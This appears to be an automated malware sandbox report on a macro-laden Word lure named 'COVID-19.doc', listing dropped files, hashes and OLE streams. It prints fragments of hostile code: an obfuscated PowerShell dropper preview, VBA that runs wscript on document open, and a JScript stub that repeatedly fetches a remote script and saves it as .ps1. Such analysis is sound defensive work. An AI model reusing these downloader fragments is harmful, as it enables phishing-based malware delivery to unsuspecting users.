                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210120103200..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 648351 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1..Process ID: 5656..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210120103203..**********************..PS>CommandInvocation(rhedxdcy.z3u.ps1): "rhedxdcy.z3u.ps1"..**********************..Command start time: 20210120103533..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 2
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\BIT36CF.tmp
                  Process:C:\Windows\System32\svchost.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):76082
                  Entropy (8bit):5.580063013682857
                  Encrypted:false
                  SSDEEP:1536:EAdEbt2aF+ZjZT1ZJem9ZBMXbb5mumoHCcNl42SeZ:EAdEbt2LTl9zMrVZmotGY
                  MD5:C2A40C323A4C4083AF3246E16C4C1D26
                  SHA1:80DB1FDAEA9DBB49C718045F09AC114BFEC315F7
                  SHA-256:0BF80B6455609CF0DC13BAC5B4ED24766BBE2D04F86023930C367736EA76D91E
                  SHA-512:35BF1E2D7D037C0CB738A031169B199321AECB358DC53AD1DC6F4452E8BA97FEE502D5F3B42AFAE8575D76A7CB2312DB8019AA7AF89DBB91270B7A4A3370F98A
                  Malicious:false
                  Preview: Set-StrictMode -Version 2.function sIZU.{.$BiYK=JqKKPZ '7'.$BiYK.}.function dDJBY.{.$VpsSYb=AxKemD A v h e T U T I.$Mm5mIV=oXkeJ F c '2' q.$L2tm62=AUvxo q + O t C 9 U y W.$L2tm62+$VpsSYb+$Mm5mIV.}.function QAQA.{.Param ($wL8zIF,$QfM,$uyg1,$zmx,$fRLNeS,$TEVz).$wL8zIF+$uyg1+$fRLNeS+$zmx+$TEVz+$QfM.}.function xNkqnI.{.$Qlw=ESYcq q U c.$JTQ=idmw A e U c l Z D A X P /.$Kqeauh=FvAWc I W C T.$TxQjW=gwmyc U i 1 + O / z O f I.$GtK34=eYubG C m w j y w t z 2 W l p B I.$rJsrKM=ZyJLib S f E.$Ne5o=oYatS / Y W C X s T S u H f t 6.$pwNw8p=LohD V B K K R A a.$Ne5o+$TxQjW+$rJsrKM+$GtK34+$pwNw8p+$Kqeauh+$JTQ+$Qlw.}.function QuuQww.{.$fYmBp=oYatS l e l D d e c t e e R f e.$C6vy=ZyJLib a t g.$Z0pNv=JqKKPZ e.$fYmBp+$C6vy+$Z0pNv.}.function RjVr.{.$lihvwX=jZPPm c.$lihvwX.}.function zQgMfg.{.$GatrHx=lSxu Q b A A 6 i B 9 2.$lt1=dtUCnQ t J e o G m z.$FyS=JqKKPZ V.$FIA9=oXkeJ Q U g U.$FIA9+$lt1+$GatrHx+$FyS.}.function iWLvg.{.$V4IY=lSxu R S K H Z 8 G W 8.$KU936I=WIWQOu V P u f n s 2 k d d V B m y.$PoRDSf=ZyJLib u
                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):19068
                  Entropy (8bit):5.418353568002772
                  Encrypted:false
                  SSDEEP:384:JtysEnIVH09h60YeZSY4D3Zug832RGxfpOQnw/e1nsD1D:11YvYIpMZ5WfpOjm1nK
                  MD5:0F9A007664218141AA44F0EFF73D5F2F
                  SHA1:89EF73717C50EC3FBB06103FFD33D6E128BF4637
                  SHA-256:457E303D33E6BA88B856FF13FA4807802C5ABA1F5DBE5AE1D77DA54D69723E12
                  SHA-512:82D540E7DAD128BC5D0B04C44E9EA713647BAAAF09B8E7B35F86D73D9A4336DD86FA2BB164A354AE1B977F37A073EA77C05B6C96C0781C0EFB698A3C91881450
                  Malicious:false
                  Preview: @...e...........................................................H...............<@.^.L."My...:,..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                  C:\Windows\Temp\__PSScriptPolicyTest_jtn2f3ar.yfz.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Windows\Temp\__PSScriptPolicyTest_ydow2vrz.d3l.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: -535, Author: , Template: Normal.dotm, Last Saved By: Windows User, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 05:57:00, Create Time/Date: Mon Jan 18 22:07:00 2021, Last Saved Time/Date: Tue Jan 19 18:30:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
                  Entropy (8bit):7.474426291744808
                  TrID:
                  • Microsoft Word document (32009/1) 79.99%
                  • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                  File name:COVID-19.doc
                  File size:409088
                  MD5:9f9f50f3c32ee660a8bbe6616dda8b34
                  SHA1:6c338a10e894bcad8c67e5da332a6cd7f75f35e0
                  SHA256:9d063fd60d7d0fb2d4d92f0f348bb2397cf80dd8a4fec5680647469b570f2afe
                  SHA512:bb447e4fc15c4b6186e6a7ad913b695a70e4392bb6e7ee5467831dd2b34db3a7256f927b54be555e148f5906fc41cf0c6fd887f86387cb29aacb6d568563c933
                  SSDEEP:6144:b4pXcA1eWEqP9w1n+DtGMYkvfFvOnOIl7eYoOcS/fj3zjNThY0pb:EWWeCYn+rNLIJ6VSHjN7N
                  File Content Preview:........................>......................................................................................................................................................................................................................................

                  File Icon

                  Icon Hash:74f4c4c6c1cac4d8

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "COVID-19.doc"

                  Indicators

                  Has Summary Info:True
                  Application Name:Microsoft Office Word
                  Encrypted Document:False
                  Contains Word Document Stream:True
                  Contains Workbook/Book Stream:False
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:True

                  Summary

                  Code Page:-535
                  Title:
                  Subject:
                  Author:
                  Keywords:
                  Comments:
                  Template:Normal.dotm
                  Last Saved By:Windows User
                  Revion Number:5
                  Total Edit Time:21420
                  Create Time:2021-01-18 22:07:00
                  Last Saved Time:2021-01-19 18:30:00
                  Number of Pages:1
                  Number of Words:0
                  Number of Characters:2
                  Creating Application:Microsoft Office Word
                  Security:0

                  Document Summary

                  Document Code Page:-535
                  Number of Lines:1
                  Number of Paragraphs:1
                  Thumbnail Scaling Desired:False
                  Company:
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:786432

                  Streams with VBA

                  VBA File Name: ThisDocument.cls, Stream Size: 2850
                  General
                  Stream Path:Macros/VBA/ThisDocument
                  VBA File Name:ThisDocument.cls
                  Stream Size:2850
                  Data ASCII:. . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . u Q R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . x . C . . . . . U h . . . . . . . . I . + . . W . . . . . . . . . . . . . . . . . . . . . . . ^ . . 0 R . . @ . . u . . . 6 p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:01 16 01 00 01 00 01 00 00 d6 05 00 00 e4 00 00 00 62 02 00 00 a0 07 00 00 dd 05 00 00 d9 08 00 00 00 00 00 00 01 00 00 00 75 51 52 d1 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 a4 04 6b 09 d4 78 ae 43 b0 e0 a9 ec 05 55 68 e2 14 d5 f5 1e c5 fd fa 49 83 2b 11 06 57 fb b9 d6 00 00 00 00 00 00 00 00 00 00 00 00 00

                  VBA Code Keywords

                  Keyword
                  Dir("x:\",
                  VB_Name
                  VB_Creatable
                  VB_Exposed
                  ActiveDocument.Path
                  Print
                  Until
                  Replace(f,
                  Replace(s,
                  "\\"))
                  "wscript
                  DateAdd("s",
                  VB_Customizable
                  /e:jscript
                  ".tmp"
                  DoEvents
                  ".doc",
                  Document_Open()
                  Output
                  VB_TemplateDerived
                  "ThisDocument"
                  "%%U%%",
                  False
                  Attribute
                  Replace(ActiveDocument.Name,
                  Shell
                  VB_PredeclaredId
                  VB_GlobalNameSpace
                  VB_Base
                  Close
                  "%%PS%%",
                  VBA Code
                  VBA File Name: UserForm1.frm, Stream Size: 1618
                  General
                  Stream Path:Macros/VBA/UserForm1
                  VBA File Name:UserForm1.frm
                  Stream Size:1618
                  Data ASCII:. . . . . . . . . h . . . . . . . . . . . . . . . o . . . 7 . . . . . . . . . . . u Q z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] r U . . 0 J . . . . ; d S / . K . . f . ; G . . . . > . . . . . . . . . / I . g . . , U . . . . . . . . I . . G O E . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:01 16 01 00 00 00 01 00 00 68 04 00 00 e4 00 00 00 84 02 00 00 96 04 00 00 6f 04 00 00 37 05 00 00 02 00 00 00 01 00 00 00 75 51 7a 10 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 95 5d 72 55 2e 07 30 4a 89 ef 94 f9 3b 64 53 2f 8a 4b db ec 66 09 3b 47 80 f1 e1 af 3e 90 f3 1a 12 95 ca 01 04 a0 2f 49 8d 67 d5 1b 2c

                  VBA Code Keywords

                  Keyword
                  False
                  Private
                  VB_Exposed
                  Attribute
                  VB_Name
                  VB_Creatable
                  VB_PredeclaredId
                  VB_GlobalNameSpace
                  VB_Base
                  VB_Customizable
                  VB_TemplateDerived
                  UserForm_Click()
                  VBA Code

                  Streams

                  Stream Path: \x1CompObj, File Type: data, Stream Size: 160
                  General
                  Stream Path:\x1CompObj
                  File Type:data
                  Stream Size:160
                  Entropy:3.99059075143
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q N . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . O . f . f . i . c . e . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 4e 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 4f 00 66 00 66 00 69 00 63 00 65 00 20 00 57 00
                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.303808718283
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 10 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5SummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.555003203852
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 8c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 d8 00 00 00 06 00 00 00 e4 00 00 00 07 00 00 00 f0 00 00 00 08 00 00 00 04 01 00 00 09 00 00 00 1c 01 00 00
                  Stream Path: 1Table, File Type: data, Stream Size: 6841
                  General
                  Stream Path:1Table
                  File Type:data
                  Stream Size:6841
                  Entropy:6.09008436485
                  Base64 Encoded:True
                  Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                  Data Raw:6a 04 0f 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                  Stream Path: Data, File Type: data, Stream Size: 371167
                  General
                  Stream Path:Data
                  File Type:data
                  Stream Size:371167
                  Entropy:7.61641986305
                  Base64 Encoded:True
                  Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . J 8 # & r . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . f . . . . . . . . . . . . . . . . . . . C . . . B . . . . A . . . . . . * . . . . . . . . . . . . . . . > . H . 8 . 1 . : . 0 . . 2 . > . @ . 4 . . = . 0 . . C . : . @ . . 2 . . . . . . . . . . . . . . . R . . . % . . . . . . . . . f . . . . y . s ) . . . . . . . . . . . . . D . . . . . 5 . . F . . . . . . . . . . f . . . . y . s ) . . . . . . . . . ) E x i
                  Data Raw:df a9 05 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 38 23 26 72 02 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 66 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 42 00 00 00 04 41 01 00 00 00 05 c1 2a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 3e 04 48 04
                  Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 484
                  General
                  Stream Path:Macros/PROJECT
                  File Type:ASCII text, with CRLF line terminators
                  Stream Size:484
                  Entropy:5.38554759732
                  Base64 Encoded:True
                  Data ASCII:I D = " { 9 B A 0 8 4 6 4 - 8 5 7 B - 4 7 4 4 - 9 0 8 F - D 1 F F F 6 1 F F F A 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D B D 9 D B 5 1 6 7 5 5 6 7 5 5 6 7 5 5 6 7 5 5 " . . D P B = " 6 3 6
                  Data Raw:49 44 3d 22 7b 39 42 41 30 38 34 36 34 2d 38 35 37 42 2d 34 37 34 34 2d 39 30 38 46 2d 44 31 46 46 46 36 31 46 46 46 41 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42
                  Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71
                  General
                  Stream Path:Macros/PROJECTwm
                  File Type:data
                  Stream Size:71
                  Entropy:3.29226192431
                  Base64 Encoded:False
                  Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                  Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00
                  Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                  General
                  Stream Path:Macros/UserForm1/\x1CompObj
                  File Type:data
                  Stream Size:97
                  Entropy:3.61064918306
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 292
                  General
                  Stream Path:Macros/UserForm1/\x3VBFrame
                  File Type:ASCII text, with CRLF line terminators
                  Stream Size:292
                  Entropy:4.57455623175
                  Base64 Encoded:True
                  Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 5 2 0 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 5 0 5 5 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                  Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                  Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 94
                  General
                  Stream Path:Macros/UserForm1/f
                  File Type:data
                  Stream Size:94
                  Entropy:2.71126254613
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . } . . . " . . . # . . . . . . . . . . . . . . . . 0 . . . . . h o . . ( . . . . . . . . . . . . . 2 . . . . . . . . . . . L a b e l 1 . . { . . . . . . .
                  Data Raw:00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 d4 22 00 00 dd 23 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 30 00 00 00 00 01 68 6f 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 1c 02 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 7b 02 00 00 d4 00 00 00
                  Stream Path: Macros/UserForm1/o, File Type: data, Stream Size: 540
                  General
                  Stream Path:Macros/UserForm1/o
                  File Type:data
                  Stream Size:540
                  Entropy:5.18432057045
                  Base64 Encoded:False
                  Data ASCII:. . . . ( . . . . . . . v a r o = W S c r i p t . C r e a t e O b j e c t ( " M S X M L 2 . X M L H T T P " ) ; . . v a r p s = ' % % P S % % . p s 1 ' . . w h i l e ( t r u e ) { . . o . O p e n ( ' G E T ' , ' % % U % % ' , 0 ) ; . . o . S e n d ( ) ; . . i f ( o . S t a t u s = = 2 0 0 ) { . . v a r s o = n e w A c t i v e X O b j e c t ( ' S c r i p t i n g . F i l e S y s t e m O b j e c t ' ) ; . . v a r f o = s
                  Data Raw:00 02 fc 01 28 00 00 00 e9 01 00 80 76 61 72 20 6f 20 3d 20 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 4d 53 58 4d 4c 32 2e 58 4d 4c 48 54 54 50 22 29 3b 0d 0a 76 61 72 20 70 73 20 3d 20 27 25 25 50 53 25 25 2e 70 73 31 27 0d 0a 77 68 69 6c 65 20 28 74 72 75 65 29 20 7b 0d 0a 20 20 20 20 6f 2e 4f 70 65 6e 28 27 47 45 54 27 2c 27 25 25 55 25 25 27 2c 30 29 3b
                  Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3258
                  General
                  Stream Path:Macros/VBA/_VBA_PROJECT
                  File Type:data
                  Stream Size:3258
                  Entropy:4.23605935534
                  Base64 Encoded:False
                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                  Data Raw:cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                  Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 825
                  General
                  Stream Path:Macros/VBA/dir
                  File Type:data
                  Stream Size:825
                  Entropy:6.51401324555
                  Base64 Encoded:True
                  Data ASCII:. 5 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . h . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . . a .
                  Data Raw:01 35 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 aa 68 f6 61 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                  Stream Path: WordDocument, File Type: data, Stream Size: 4096
                  General
                  Stream Path:WordDocument
                  File Type:data
                  Stream Size:4096
                  Entropy:1.03818034246
                  Base64 Encoded:False
                  Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
